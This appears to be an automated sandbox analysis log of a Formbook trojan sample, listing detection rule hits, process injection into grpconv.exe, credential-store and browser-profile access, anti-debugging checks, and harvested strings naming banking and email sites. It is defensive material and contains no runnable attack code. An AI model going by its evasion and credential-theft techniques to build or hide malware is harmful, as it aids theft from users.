          Source: 00000000.00000002.2131471529.0000000000411000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.3876436404.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.2132420078.0000000001750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.3875595230.0000000000620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.3876687207.0000000005530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.2134057488.0000000004430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: lByv6mqTCJ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: lByv6mqTCJ.exeStatic PE information: Section .text
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/1@11/8
          Source: C:\Windows\SysWOW64\grpconv.exeFile created: C:\Users\user\AppData\Local\Temp\13612MI5KJump to behavior
          Source: lByv6mqTCJ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: grpconv.exe, 00000003.00000002.3875818549.00000000028CD000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000003.00000002.3875818549.00000000028B8000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000003.00000002.3875818549.00000000028D0000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000003.00000003.2362477743.00000000028B8000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000003.00000003.2362477743.00000000028D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: lByv6mqTCJ.exeReversingLabs: Detection: 76%
          Source: unknownProcess created: C:\Users\user\Desktop\lByv6mqTCJ.exe "C:\Users\user\Desktop\lByv6mqTCJ.exe"
          Source: C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exeProcess created: C:\Windows\SysWOW64\grpconv.exe "C:\Windows\SysWOW64\grpconv.exe"
          Source: C:\Windows\SysWOW64\grpconv.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
          Source: C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exeProcess created: C:\Windows\SysWOW64\grpconv.exe "C:\Windows\SysWOW64\grpconv.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\grpconv.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: ieframe.dllJump to behavior
          Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: mlang.dllJump to behavior
          Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: winsqlite3.dllJump to behavior
          Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: vaultcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\grpconv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
          Source: C:\Windows\SysWOW64\grpconv.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: lByv6mqTCJ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: grpconv.pdb source: lByv6mqTCJ.exe, 00000000.00000003.2097880175.000000000139D000.00000004.00000020.00020000.00000000.sdmp, lByv6mqTCJ.exe, 00000000.00000003.2131424199.00000000013A6000.00000004.00000020.00020000.00000000.sdmp, ooaSzUjoYqoTW.exe, 00000002.00000002.3876120909.000000000116E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: grpconv.pdbGCTL source: lByv6mqTCJ.exe, 00000000.00000003.2097880175.000000000139D000.00000004.00000020.00020000.00000000.sdmp, lByv6mqTCJ.exe, 00000000.00000003.2131424199.00000000013A6000.00000004.00000020.00020000.00000000.sdmp, ooaSzUjoYqoTW.exe, 00000002.00000002.3876120909.000000000116E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ooaSzUjoYqoTW.exe, 00000002.00000002.3875597421.00000000004CE000.00000002.00000001.01000000.00000004.sdmp, ooaSzUjoYqoTW.exe, 00000005.00000000.2199021776.00000000004CE000.00000002.00000001.01000000.00000004.sdmp
          Source: Binary string: wntdll.pdbUGP source: lByv6mqTCJ.exe, 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, lByv6mqTCJ.exe, 00000000.00000003.2026593857.000000000148C000.00000004.00000020.00020000.00000000.sdmp, lByv6mqTCJ.exe, 00000000.00000003.2028568483.0000000001631000.00000004.00000020.00020000.00000000.sdmp, lByv6mqTCJ.exe, 00000000.00000002.2132478501.000000000197E000.00000040.00001000.00020000.00000000.sdmp, grpconv.exe, 00000003.00000003.2135035508.00000000043E4000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000003.00000002.3876792528.0000000004590000.00000040.00001000.00020000.00000000.sdmp, grpconv.exe, 00000003.00000002.3876792528.000000000472E000.00000040.00001000.00020000.00000000.sdmp, grpconv.exe, 00000003.00000003.2131632668.0000000004233000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: lByv6mqTCJ.exe, lByv6mqTCJ.exe, 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, lByv6mqTCJ.exe, 00000000.00000003.2026593857.000000000148C000.00000004.00000020.00020000.00000000.sdmp, lByv6mqTCJ.exe, 00000000.00000003.2028568483.0000000001631000.00000004.00000020.00020000.00000000.sdmp, lByv6mqTCJ.exe, 00000000.00000002.2132478501.000000000197E000.00000040.00001000.00020000.00000000.sdmp, grpconv.exe, grpconv.exe, 00000003.00000003.2135035508.00000000043E4000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000003.00000002.3876792528.0000000004590000.00000040.00001000.00020000.00000000.sdmp, grpconv.exe, 00000003.00000002.3876792528.000000000472E000.00000040.00001000.00020000.00000000.sdmp, grpconv.exe, 00000003.00000003.2131632668.0000000004233000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_00413040 push eax; ret 0_2_00413042
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_00425040 push eax; iretd 0_2_00425043
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_00416167 push ebp; ret 0_2_0041616B
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_00427A84 pushad ; iretd 0_2_00427A90
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_00427B34 pushad ; retf 0_2_00427B35
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_00423560 push 00000076h; iretd 0_2_0042356F
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_017E225F pushad ; ret 0_2_017E27F9
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_017E27FA pushad ; ret 0_2_017E27F9
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018109AD push ecx; mov dword ptr [esp], ecx0_2_018109B6
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_017E283D push eax; iretd 0_2_017E2858
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_017E1366 push eax; iretd 0_2_017E1369
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_045927FA pushad ; ret 3_2_045927F9
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_0459225F pushad ; ret 3_2_045927F9
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_0459283D push eax; iretd 3_2_04592858
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_045C09AD push ecx; mov dword ptr [esp], ecx3_2_045C09B6
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_00635810 push ebx; retf 1E97h3_2_0063593E
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_0063051D push 00000076h; iretd 3_2_0063052C
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_006406DD pushfd ; ret 3_2_006406F5
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_00640910 push es; ret 3_2_00640994
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_00634A41 pushad ; iretd 3_2_00634A4D
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_00634AF1 pushad ; retf 3_2_00634AF2
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_00623124 push ebp; ret 3_2_00623128
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_0063BF75 push ss; ret 3_2_0063BF54
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_0063BF18 push ss; ret 3_2_0063BF54
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_00631FFD push eax; iretd 3_2_00632000
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_0442B438 push ds; iretd 3_2_0442B43B
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04425711 push esi; retf 3_2_04425732
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_0443178B push edx; ret 3_2_04431791
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_0442D0E0 push es; iretd 3_2_0442D173
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04435192 push eax; ret 3_2_04435194
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_0442D198 push es; iretd 3_2_0442D173
          Source: lByv6mqTCJ.exeStatic PE information: section name: .text entropy: 7.995417785217454
          Source: C:\Windows\SysWOW64\grpconv.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\grpconv.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\grpconv.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\grpconv.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\grpconv.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Switches to a custom stack to bypass stack traces
          Source: C:\Windows\SysWOW64\grpconv.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
          Source: C:\Windows\SysWOW64\grpconv.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
          Source: C:\Windows\SysWOW64\grpconv.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
          Source: C:\Windows\SysWOW64\grpconv.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
          Source: C:\Windows\SysWOW64\grpconv.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
          Source: C:\Windows\SysWOW64\grpconv.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
          Source: C:\Windows\SysWOW64\grpconv.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
          Source: C:\Windows\SysWOW64\grpconv.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0185096E rdtsc 0_2_0185096E
          Source: C:\Windows\SysWOW64\grpconv.exeWindow / User API: threadDelayed 9843Jump to behavior
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeAPI coverage: 0.8 %
          Source: C:\Windows\SysWOW64\grpconv.exeAPI coverage: 2.6 %
          Source: C:\Windows\SysWOW64\grpconv.exe TID: 1396Thread sleep count: 130 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\grpconv.exe TID: 1396Thread sleep time: -260000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\grpconv.exe TID: 1396Thread sleep count: 9843 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\grpconv.exe TID: 1396Thread sleep time: -19686000s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exe TID: 3840Thread sleep time: -55000s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exe TID: 3840Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\grpconv.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\grpconv.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_0063C1E0 FindFirstFileW,FindNextFileW,FindClose,3_2_0063C1E0
          Source: 13612MI5K.3.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
          Source: 13612MI5K.3.drBinary or memory string: discord.comVMware20,11696428655f
          Source: 13612MI5K.3.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
          Source: 13612MI5K.3.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
          Source: 13612MI5K.3.drBinary or memory string: global block list test formVMware20,11696428655
          Source: 13612MI5K.3.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
          Source: ooaSzUjoYqoTW.exe, 00000005.00000002.3876373942.0000000000E3F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle
          Source: 13612MI5K.3.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
          Source: 13612MI5K.3.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
          Source: 13612MI5K.3.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
          Source: 13612MI5K.3.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
          Source: 13612MI5K.3.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
          Source: 13612MI5K.3.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
          Source: 13612MI5K.3.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
          Source: 13612MI5K.3.drBinary or memory string: outlook.office365.comVMware20,11696428655t
          Source: 13612MI5K.3.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
          Source: grpconv.exe, 00000003.00000002.3875818549.000000000280A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2468905153.00000196D45CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: 13612MI5K.3.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
          Source: 13612MI5K.3.drBinary or memory string: outlook.office.comVMware20,11696428655s
          Source: 13612MI5K.3.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
          Source: 13612MI5K.3.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
          Source: 13612MI5K.3.drBinary or memory string: AMC password management pageVMware20,11696428655
          Source: 13612MI5K.3.drBinary or memory string: tasks.office.comVMware20,11696428655o
          Source: 13612MI5K.3.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
          Source: 13612MI5K.3.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
          Source: 13612MI5K.3.drBinary or memory string: interactivebrokers.comVMware20,11696428655
          Source: 13612MI5K.3.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
          Source: 13612MI5K.3.drBinary or memory string: dev.azure.comVMware20,11696428655j
          Source: 13612MI5K.3.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
          Source: 13612MI5K.3.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
          Source: 13612MI5K.3.drBinary or memory string: bankofamerica.comVMware20,11696428655x
          Source: 13612MI5K.3.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
          Source: 13612MI5K.3.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\grpconv.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0185096E rdtsc 0_2_0185096E
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_00427153 LdrLoadDll,0_2_00427153
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01850185 mov eax, dword ptr fs:[00000030h]0_2_01850185
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018CC188 mov eax, dword ptr fs:[00000030h]0_2_018CC188
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018CC188 mov eax, dword ptr fs:[00000030h]0_2_018CC188
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018B4180 mov eax, dword ptr fs:[00000030h]0_2_018B4180
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018B4180 mov eax, dword ptr fs:[00000030h]0_2_018B4180
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0189019F mov eax, dword ptr fs:[00000030h]0_2_0189019F
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0189019F mov eax, dword ptr fs:[00000030h]0_2_0189019F
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0189019F mov eax, dword ptr fs:[00000030h]0_2_0189019F
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0189019F mov eax, dword ptr fs:[00000030h]0_2_0189019F
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0180A197 mov eax, dword ptr fs:[00000030h]0_2_0180A197
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0180A197 mov eax, dword ptr fs:[00000030h]0_2_0180A197
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0180A197 mov eax, dword ptr fs:[00000030h]0_2_0180A197
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018D61C3 mov eax, dword ptr fs:[00000030h]0_2_018D61C3
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018D61C3 mov eax, dword ptr fs:[00000030h]0_2_018D61C3
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0188E1D0 mov eax, dword ptr fs:[00000030h]0_2_0188E1D0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0188E1D0 mov eax, dword ptr fs:[00000030h]0_2_0188E1D0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0188E1D0 mov ecx, dword ptr fs:[00000030h]0_2_0188E1D0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0188E1D0 mov eax, dword ptr fs:[00000030h]0_2_0188E1D0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0188E1D0 mov eax, dword ptr fs:[00000030h]0_2_0188E1D0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018E61E5 mov eax, dword ptr fs:[00000030h]0_2_018E61E5
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018401F8 mov eax, dword ptr fs:[00000030h]0_2_018401F8
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018BE10E mov eax, dword ptr fs:[00000030h]0_2_018BE10E
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018BE10E mov ecx, dword ptr fs:[00000030h]0_2_018BE10E
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018BE10E mov eax, dword ptr fs:[00000030h]0_2_018BE10E
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018BE10E mov eax, dword ptr fs:[00000030h]0_2_018BE10E
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018BE10E mov ecx, dword ptr fs:[00000030h]0_2_018BE10E
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018BE10E mov eax, dword ptr fs:[00000030h]0_2_018BE10E
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018BE10E mov eax, dword ptr fs:[00000030h]0_2_018BE10E
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018BE10E mov ecx, dword ptr fs:[00000030h]0_2_018BE10E
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018BE10E mov eax, dword ptr fs:[00000030h]0_2_018BE10E
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018BE10E mov ecx, dword ptr fs:[00000030h]0_2_018BE10E
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018BA118 mov ecx, dword ptr fs:[00000030h]0_2_018BA118
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018BA118 mov eax, dword ptr fs:[00000030h]0_2_018BA118
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018BA118 mov eax, dword ptr fs:[00000030h]0_2_018BA118
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018BA118 mov eax, dword ptr fs:[00000030h]0_2_018BA118
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018D0115 mov eax, dword ptr fs:[00000030h]0_2_018D0115
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01840124 mov eax, dword ptr fs:[00000030h]0_2_01840124
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018A4144 mov eax, dword ptr fs:[00000030h]0_2_018A4144
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018A4144 mov eax, dword ptr fs:[00000030h]0_2_018A4144
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018A4144 mov ecx, dword ptr fs:[00000030h]0_2_018A4144
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018A4144 mov eax, dword ptr fs:[00000030h]0_2_018A4144
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018A4144 mov eax, dword ptr fs:[00000030h]0_2_018A4144
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018A8158 mov eax, dword ptr fs:[00000030h]0_2_018A8158
